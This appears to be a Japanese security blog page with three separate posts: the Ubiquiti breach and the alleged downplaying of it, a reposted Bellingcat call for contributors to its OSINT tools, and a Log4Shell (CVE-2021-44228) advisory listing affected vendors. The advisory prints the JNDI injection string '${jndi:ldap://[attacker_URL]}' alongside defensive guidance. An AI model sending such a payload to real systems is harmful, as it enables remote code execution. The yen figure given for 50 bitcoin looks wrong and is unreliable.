今年1月、Ubiquiti社は顧客に対し、正体不明のサードパーティのクラウドプロバイダーがホストする特定のITシステムへの不正アクセスが発見されたことを通知しました。同社は当時、ユーザーデータが漏洩したという証拠は見つかっていないとしながらも、その可能性を否定できないとして、顧客にパスワードの変更を勧めていました。

Ubiquiti がセキュリティ侵害を公表したとき、同社の株式への影響はわずかで、その後、同社の株式の価値は驚異的に上昇し、1 月 12 日の 1 株あたりおよそ 250 ドルから 3 月 30 日の 1 株あたり 350 ドルまで上昇しました。しかし、セキュリティ侵害が顧客や投資家に信じさせていたよりも大きかったかもしれないというニュースを受けて、ユビキティの株価は本稿執筆時点で290ドルまで下がっています。

3月30日(火)、サイバーセキュリティ・ブロガーのブライアン・クレブス氏は、Ubiquiti社が同社の株式市場価値への影響を軽減するために、実際には「壊滅的」であった事件を「大々的に軽視」していたことを、侵害への対応に関わった人物から聞いたと報告しました。

クレブス氏の情報源によると、侵入者はUbiquiti社のAWSサーバーへのアクセス権を取得した後、ハッキングについて口止めするために同社から50ビットコイン(約300万円相当)を脅し取ろうとしました。情報源によると、「侵入者は、Ubiquitiの従業員のLastPassアカウントから特権的な認証情報を取得し、すべてのS3データバケット、すべてのアプリケーションログ、すべてのデータベース、すべてのユーザーデータベースの認証情報、シングルサインオン(SSO)クッキーの偽造に必要な秘密を含む、UbiquitiのすべてのAWSアカウントへのルート管理者アクセスを得た」とのことです。このハッカーは、リモート認証によってUbiquitiのクラウドベースのデバイスにアクセスしていたとされています。

Ubiquiti社は、クレブス氏の報告を受けて水曜日に声明を発表し、法執行機関による調査が進行中であるため、これ以上のコメントはできないと述べました。"この事件を受けて、当社は外部の事件対応専門家を活用し、攻撃者が当社のシステムから締め出されたことを確認するために徹底的な調査を行いました。"これらの専門家は、顧客情報がアクセスされたという証拠はなく、標的にされたという証拠もないことを確認しました。この攻撃者は、盗んだソースコードと特定のIT認証情報を公開すると脅迫し、当社を恐喝しようとして失敗しましたが、顧客情報にアクセスしたとは言っていません。このことと他の証拠から、今回の事件に関連して顧客情報が標的になったり、アクセスされたりしたことはないと考えています」と述べています。 

少なくとも2つの法律事務所が、ユビキティ社が連邦証券法に違反したかどうかを調査しており、同社の投資家に連絡を取るよう呼びかけている。

OSINTツール開発の助っ人募集 / Help Bellingcat Build Tools For Open Source Investigators!(転載)


Help Bellingcat Build Tools For Open Source Investigators! 

オープンソースの調査は、人間の研究者のスキルと努力に依存しています。これは今後も変わりません。しかし、ツールを使えば、調査のプロセスを大幅に楽にすることができます。

私たちBellingcatは、他の多くの調査機関やオープンソース愛好家と同様、主に無料で利用できるツールに依存しています。これは、多くの有料ツールにアクセスするために必要な予算がないためで、私たちは非営利団体です。しかし、それだけでなく、私たちはオープンソースソフトウェアの考え方を信じています。

私たちは、あらゆる分野のデジタル研究者が、オープンソースの調査を行うための方法やツールを自由に使えるようにしたいと考えています。そのために、私たちはウェブサイトで無料の調査ガイドリソースリストを公開しています。また、Bellingcat Githubを立ち上げました。ここでは、Bellingcatの調査技術チームが開発・使用するツールの多くを、オープンソースプロジェクトとして公開しています。

また、これらのツールを公開するだけでなく、オープンソースソフトウェアの経験者やオープンソース調査の愛好家からの投稿や共同研究も受け付けています。

支援の方法

Bellingcat Githubにあるツールをご覧いただき、より良いものにするためにご協力ください。
 
オープンクエスチョンのリストを読んで、オープンソース調査員に関連する技術的課題に取り組んでみてください。

例えば、大学のコンピュータサイエンス学科を率いる方や、技術系の研究機関にお勤めの方で、ツール開発のコラボレーションの具体的なアイデアをお持ちの方(ソフトウェアはオープンソースであることが条件です)は、こちらからお気軽にご連絡ください。

同じことが、自分の仕事のために特定のツールを必要としているすべてのオープンソース調査員にも当てはまります。ここでアイデアを提出していただき、そのツールの開発が実現可能と思われる場合には、技術チャレンジのリストに加えさせていただきます。また、直接「プルリクエスト」を提出することもできます。もしかしたら、親切なソフトウェア開発者がそれを拾ってくれるかもしれません。

 

Githubツールの使用、テスト、改善

私たちのGithubにあるツールのリストは、時間とともに増えていきます。現在、私たちの小さなコレクションには、Instagramの「ロケーション」を見つけるためのツール、Google Sheets用の自動ビデオアーカイバ、曇った衛星画像の中から雲のない小さな小領域を見つけるためのGoogle Earth Engineアプリケーションなどがあります。

皆さまのご協力により、これらのツールが改善され、さらに追加されていくことを期待しています。これらのプロジェクトの多くは、すでにGithubのIssuesページに改善提案が掲載されており、コミュニティへの貢献に最適なハイライトされた課題も含まれています。

ここでは、Githubに掲載されているツールのうち、あなたが開発に貢献できるものについてご紹介します。

instagram-location-search

インスタグラムは、公共の場での共有とジオタグの両方が社会的な規範となっている点で、現代のソーシャルメディアの中ではややユニークな存在です。しかし、写真は特定の座標で検索できるわけではなく、Instagramの「場所」に関連付けられています。Instagramでは、これらの場所を緯度と経度の座標で検索したり発見したりする方法は提供されておらず、都市名や場所の名前でしか検索できません。例えば、アムステルダム中央駅からのインスタグラムの投稿を見つけるのは簡単ですが、近くの他の場所で撮影された写真を見つけるのは、探しているもの(および関連するインスタグラムの地名)がはっきりしていない限り、簡単な方法ではありません。

しかし、モバイルのInstagramアプリは、特定のInstagramの場所の近くにある場所を見つけるプライベートAPI(Application Programming Interface)にアクセスし、新しい写真の場所を選択する際に使用されます。Bellingcatは、このAPIを利用して、Instagramの場所を見つけるためのツールを開発しました。


Instagramの特定の場所やユーザーから画像をダウンロードするためのツールはすでにいくつか存在します。instagram-location-searchの便利な拡張機能は、これらのツールを統合して、研究者が特定の緯度と経度の周辺からすべての画像を1つのステップでスクレイピングできるようにすることです。

telegram-phone-number-checker

Telegram電話番号チェッカーは、研究者が特定の電話番号または電話番号のリストがTelegramでのアカウント作成に使用されたかどうかを調べたい場合に便利です。

電話番号を調べるために、このツールはTelegram APIを使用し、「API_ID」と「API_HASH」を必要とします。電話番号がTelegramのユーザー名に関連付けられている場合、このツールは接続されているユーザー名を提供します。テレグラムではユーザー名は必須ではないので、特定の電話番号でテレグラムのアカウントが作成されているかどうかを単純に検出することもできます。

auto-archiver
youtube-dlとGoogle Sheetsを組み合わせて、ソーシャルメディアからの動画をアーカイブするためのコラボレーションインターフェースを作るツールです。これはPythonスクリプトで、定期的に(cronで)実行すると、以下のようになります。
 
    • Download recognised videos from URLs in a Google Sheet.

    • Upload these videos to a cloud storage location that is compatible with Amazon Web Service’s S3 protocol, such as S3 itself or Digital Ocean Spaces.
       
    • Update the sheet with metadata that might be useful for organisation and retrieval.

 

このツールは、2021年のアメリカ大統領就任式のソーシャルメディアの画像を扱うためにBellingcatが開発したものですが、他のさまざまな場面でも活用できると考えています。

ほとんどのメタデータはyoutube-dlによって直接提供されますが、このスクリプトは、ビデオ処理用のオープンソースツールであるffmpegを使ってビデオフォーマットを変換し、メタデータを抽出することもできます。これを利用してサムネイルを生成し、画像としてGoogleシートに直接挿入することができます。また、動画の内容を一目で確認できる動画「コンタクトシート」用のサムネイルを定期的に生成することもできます。

The auto-archiver tool. Image credit: Bellingcat

オートアーカイバの機能を拡張し、新しいユーザーや技術者ではないユーザーが簡単に使えるようにする機会がいくつかあります。Githubのドキュメントにガイドや例を追加することは、アプリケーションの使用をより簡単にする重要な追加となります。また、Google Sheets Appのような他のアプリケーション形式があれば、セットアップの一部が簡単になるかもしれません。しかし、youtube-dlを実行するためにはリモートコンピュータが必要であり、アーカイブされたビデオをアップロードするための場所が必要であるため、サーバーのセットアップが必要になると思われます。

tiktok-timestamp

このツールは、Tiktok の動画から正確なアップロードの日付を抽出するための極めてシンプルなヘルパーです。ソース コードでは、CORS ヘッダーを提供していない Web サイトへのリクエストを実行する方法と、シンプルなクライアント サイド ツールを Github ページでホストする方法を示しています。

An example of the tiktok timestamp tool. Credit: Bellingcat

cloud-free-subregion

これは、Sentinel-2の衛星画像の中から、特定の地域に雲がないものを探し出すGoogle Earth Engineのアプリケーションです。センチネル2は、欧州宇宙機関が運用する地球観測衛星で、週に2回程度、地表のほとんどの場所の中解像度(1ピクセルあたり10メートル)の可視・赤外画像を撮影しています。この画像は、オープンソースの調査員にとって非常に有用であり、最近のBellingcatの記事では、イラクの環境汚染の理解や、エチオピアのティグライでのドローンによる戦争の主張の分析に使用されています。

このツールは、Google Earth EngineやSentinel Hubでデフォルトで提供されているように、Sentinel-2が画像全体で測定したときに大きな雲を定期的に詳細に表示する赤道地域で特に役立ちます。しかし、これらの画像の中には、関心のある特定の小さな領域で晴れているものもあります。このアプリケーションは、そのような画像を見つけるのに役立ちます。

An example of finding a Sentinel-2 image that is cloud free over a particular subregion. Credit: Bellingcat

さらに、月ごとに1枚の画像のみを含むように画像コレクションをフィルタリングすることで、多数の画像を含む大規模な時間範囲を整理するプロセスを簡素化します。また、コントラスト調整や近赤外のフォールスカラーオプションもあり、植物の視覚化にも役立ちます。

Google Earth Engineのアプリケーションとして直接アクセスすることができます。

Javaのログ出力ライブラリ「Apache Log4j」に存在するリモートから悪用可能な脆弱性(CVE-2021-44228)


Log4j: List of vulnerable products and vendor advisories:

2021年12月9日、Apache Log4jのロギング・ライブラリに重大な脆弱性があるというニュースが流れ、概念実証済みの脆弱性が出現しはじめました。

Log4jは、オープンソースのJavaロギングフレームワークで、Apache Logging Servicesの一部として、世界中のベンダーの様々なアプリケーションでエンタープライズレベルで使用されています。

Apacheは、Log4ShellまたはLogJamとも呼ばれる、現在CVE-2021-44228として追跡されている最大深刻度の脆弱性に対処するために、Log4j 2.15.0をリリースしました。

CloudflareとCisco Talosのデータによると、大規模な悪用が始まったのは、悪用コードが自由に利用できるようになってからですが、今月初めから攻撃が検出されています。

Log4Shellの欠陥は、11月24日にAlibabaのクラウドセキュリティチームによって報告されましたが、一部の攻撃者がなぜこれほど早く悪用できたのかは不明です。

Cybersecurity and Infrastructure Security Agency(CISA)のディレクターであるJen Easterly氏は、Log4Shellの脆弱性に関する土曜日の声明で、同機関が民間および公的セクターのパートナーと協力してこの問題に対処していると述べています。

Log4Shell は、Java Naming and Directory Interface (JNDI) インジェクションで、認証されないリモートでのコード実行を可能にします。攻撃者は、ブラウザのユーザーエージェントを次の形式の文字列に変更することで、これを利用することができます。

${jndi:ldap://[attacker_URL]}

この文字列は、被害者のWebサーバーのログに残り、Log4jライブラリがそれを解析すると、攻撃者のURLへのコールバックやリクエストを強制的に実行します。攻撃者は、この文字列を使用して、脆弱なマシンにエンコードされたコマンドやJavaクラスを渡すことができます。


CISAは本日、脆弱性の深刻さとその悪用が容易であることから、Log4Shell攻撃に対する防御を設定するための企業向けガイダンスを発表しました。同機関が推奨するのは、「利用可能なパッチを直ちに適用すること」であり、このプロセスに優先順位をつけることです。

パッチ適用が不可能な場合、同機関は以下の変更を推奨しています。

アプリケーションを起動する Java Virtual Machine コマンドに -Dlog4j2.formatMsgNoLookups=True という文字列を追加して log4j2.formatMsgNoLookups を true に設定する。

この場合、メッセージのフォーマットをルックアップに依存している場合、システムのロギングに影響を与える可能性があるという注意点があります。また、この緩和策はバージョン2.10以降にのみ有効です。

Log4Shellの詳細が判明した直後から、ベンダー各社は自社製品が影響を受けるかどうかの調査を開始し、その結果について情報を提供しています。

Amazon

アマゾンは、いくつかの製品をアップデートし、脆弱性のないバージョンのLog4jコンポーネントを使用するようにし、他の製品もアップデート中であるか、近い将来に新しいバージョンをリリースする予定であると発表しました。

同社は、OpenSearch、AWS Glue、S3、CloudFront、AWS Greengrass、API Gatewayなどの影響を受けるサービスに関する詳細を発表している。

Atlassian

同社の評価によると、オンプレミス製品のデフォルト設定では、悪用されやすい脆弱性はないと考えています。

JMS Appender 機能を有効にするためにデフォルトのログ設定 (log4j.properties) を変更すると、Jira Server & Data Center, Confluence Server & Data Center, Bamboo Server & Data Center, Crowd Server & Data Center, Fisheye, Crucible など一部の製品でリモートコード実行のリスクがもたらされる可能性があるそうです。

Broadcom

同社は、Log4jの脆弱性の影響を受ける複数のシマンテック製品について、緩和策とナレッジベースの記事を公開しました。CA Advanced Authentication、Symantec SiteMinder (CA Single Sign-on)、VIP Authentication Hub、Symantec Endpoint Protection Manager (SEPM)が含まれる。

Cisco

シスコは、Log4Shellの影響を受ける自社製品のリストと、12月14日から一部の製品にパッチを適用するカレンダーを公開しました。

影響を受ける製品は、以下のような様々なカテゴリーに分類されます。
  • ネットワークおよびコンテンツセキュリティ機器(Identity Services Engine、Firepower Threat Defense、Advanced Web Security Reporting Application)
  • コラボレーションとソーシャルメディア(Cisco Webex Meetings Server)
  • ネットワーク管理およびプロビジョニング(Cisco CloudCenter Suite Admin、Data Center Network Manager、IoT Control Center、Network Services Orchestrator、WAN Automation Engine)
  • エンタープライズ ルーティングとスイッチング(Cisco Network Assurance Engine、Cisco SD-WAN vManage)
Citrix

調査は現在も進行中であり、一部の製品については状況が変わる可能性がありますが、シトリックスは、Log4Shellの脆弱性がある製品としてリストアップしていません。

ConnectWise

同社のクラウドサービスであるPerchが、「潜在的な脆弱性を持つ」サードパーティーコンポーネントに依存していることが判明した、とConnectWise社のアドバイザリーには書かれています。

脆弱性のあるサードパーティは、ConnectWiseのStratoZenソリューションで使用されているFortiGuardのFortiSIEMと判明し、同社はホスティングされているStratoZenサーバーへのアクセスを一時的に制限するよう促されました。現在では、ほとんどのサービスへのアクセスが回復しています。

cPanel

フォーラムのスレッドによると、cPanelのSolrプラグインが存在するインスタンスのみが影響を受け、悪用される可能性があるが、ローカルにのみ存在するとのことです。

あるスタッフは、Log4Shellに対する緩和策を含むアップデートがcpanel-dovecot-solrパッケージに用意されていることを発表し、さらに安心感を与えてくれました。

Debian

Debian 9 (Stretch), 10 (Buster), 11 (Bullseye), 12 (Bookworm) にセキュリティアップデートとして、パッチを適用した Log4j パッケージが追加されました、と勧告があります。

Docker

Docker Officialイメージの12個に、脆弱性のあるバージョンのLog4jライブラリが使用されていることが判明しています。couchbase、elasticsearch、logstash、sonarqube、solrが含まれる。

Dockerは、「これらのイメージに含まれるLog4j 2を利用可能な最新バージョンに更新中」であり、他の理由でイメージに脆弱性がない可能性があると述べている。

FortiGuard

同社からのアドバイザリーでは、約12の同社製品に脆弱性があるとされており、そのうち4つの製品についてはすでに修正または緩和措置が展開されているとのことです。

FortiGuardは、FortiSIEM、FortiInsight、FortiMonitor、FortiPortal、FortiPolicy、ShieldXなど他の製品の修正プログラム適用時期について、アドバイザリを更新すると発表している。

F-Secure

エフセキュアのいくつかの製品のWindows版とLinux版の両方がLog4Shellの影響を受けています。Policy Manager (Policy Manager Server コンポーネントのみ)、Policy Manager Proxy、Endpoint Proxy、および Elements Connector です。

同社は、この問題を修正するための管理者向けセキュリティパッチを作成し、それを展開するためのステップバイステップの手順を提供しています。

Ghidra

NSAが提供するオープンソースのリバースエンジニアリングツールは、バージョン10.1へのアップデートを受け、Log4jの依存関係を脆弱性のないイテレーションにアップグレードしています。

IBM

IBMのLog4Shellに関するアドバイザリによると、Admin ConsoleとUDDI Registry Applicationコンポーネント経由で、WebSphere Application Serverバージョン9.0と8.5のみが脆弱性の影響を受け、この問題は解決されているとのことです。

Juniper Networks

ネットワーク会社は、同社の4つの製品が影響を受けることを明らかにした。Paragon Active Assurance、Paragon Insights、Paragon Pathfinder、Paragon Plannerの4製品に影響があることを明らかにしました。

評価は継続中ですが、現段階ではさらに6つの製品が影響を受ける可能性があります。JSAシリーズ、Junos Space Management Applications、Junos Space Network Management Platform、Network Director、Secure Analytics、Security Director (Security Director Insightsは除く)

McAfee

同社はまだ評価を完了しておらず、12製品を審査中であり、関連情報が入手でき次第、アドバイザリーを更新する予定です。

MongoDB

Log4Shellに対してパッチを適用する必要があるのはMongoDB Atlas Searchのみであると、本日更新されたアドバイザリーで同社は指摘しています。

開発元は、パッチを適用する前に悪用された証拠や侵害の指標を発見しなかったと付け加えています。

Okta

Oktaは、Log4Shellの脆弱性によるリスクを軽減するため、Okta RADIUS Server AgentおよびOkta On-Prem MFA Agentのアップデートをリリースし、お客様にアドミンコンソールからの修正プログラムの適用を強く推奨しています。

Oracle

オラクルによると、「いくつかの」自社製品が、どの製品が、いくつの製品が、脆弱性のあるバージョンのLog4jコンポーネントを使用していると公表していない。

同社は、顧客にMy Oracle Support Documentを紹介し、提供されるアップデートを "できるだけ早く "適用するよう強く推奨するセキュリティ警告を発表した。

OWASP Foundation

先日のアドバイザリで、Zed Attack Proxy (ZAP) ウェブアプリのスキャナ 2.11.1 以下のバージョンに、脆弱な Log4j コンポーネントが使用されていることが明らかになりました。

Red Hat

Red Hat は、複数の Red Hat 製品のコンポーネントが Log4Shell の影響を受けることを金曜日に明らかにし、利用可能になり次第、アップデートを適用するよう顧客に強く推奨しています。

勧告に記載されている製品は、Red Hat OpenShift 4および3.11、OpenShift Logging、OpenStack Platform 13、CodeReady Studio 12、Data Grid 8、Red Hat Fuse 7である。